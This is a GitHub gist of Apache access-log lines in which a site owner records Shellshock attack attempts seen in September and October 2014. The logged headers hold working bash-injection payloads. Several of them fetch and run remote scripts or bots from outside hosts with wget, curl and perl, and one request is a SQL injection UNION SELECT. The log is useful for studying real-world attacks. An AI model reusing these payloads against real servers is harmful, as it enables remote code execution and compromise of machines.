Created
October 12, 2014 19:05
-
-
Save brendano/38302ee92645e3a16dbd to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Shellshock attack attempts I noticed in apache logs, from grep '()' ... the shellshock-scan one I think I initiated but I think the rest are attack attempts. | |
209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" | |
94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-" | |
89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" | |
198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69" | |
54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" | |
114.91.105.103 - - [27/Sep/2014:09:36:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'wget http://sts01.com/.../reg.sh -O /tmp/reg.sh && /bin/bash /tmp/reg.sh http://197.242.148.29:8088 66.228.39.121'" | |
188.138.33.11 - - [27/Sep/2014:11:02:02 -0400] "GET /cgi-sys/php5? HTTP/1.1" 404 210 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" | |
209.222.148.184 - - [28/Sep/2014:18:11:23 -0400] "GET /cgi-sys/php5 HTTP/1.1" 404 210 "-" "() { 0v3r1d3;};echo \"Content-type: text/plain\"; echo; uname -a;" | |
82.221.128.246 - - [29/Sep/2014:02:31:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"" | |
74.112.131.246 - - [01/Oct/2014:22:19:59 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20457 "-" "Mozilla/5.0 ()" | |
74.112.131.243 - - [01/Oct/2014:22:21:01 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20456 "-" "Mozilla/5.0 ()" | |
54.213.225.160 - - [02/Oct/2014:17:22:16 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" | |
211.154.173.239 - - [03/Oct/2014:10:06:11 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget https://173.15.111.29/user --no-check-certificate;curl -O https://173.15.111.29/user -k ; perl /tmp/user;rm -rf /tmp/user\"" | |
67.214.182.202 - - [03/Oct/2014:16:54:13 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo" | |
95.110.178.157 - - [04/Oct/2014:15:45:47 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" | |
24.160.166.96 - - [04/Oct/2014:22:52:31 -0400] "GET / HTTP/1.1" 200 31825 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\"" | |
162.144.46.158 - - [05/Oct/2014:06:06:46 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment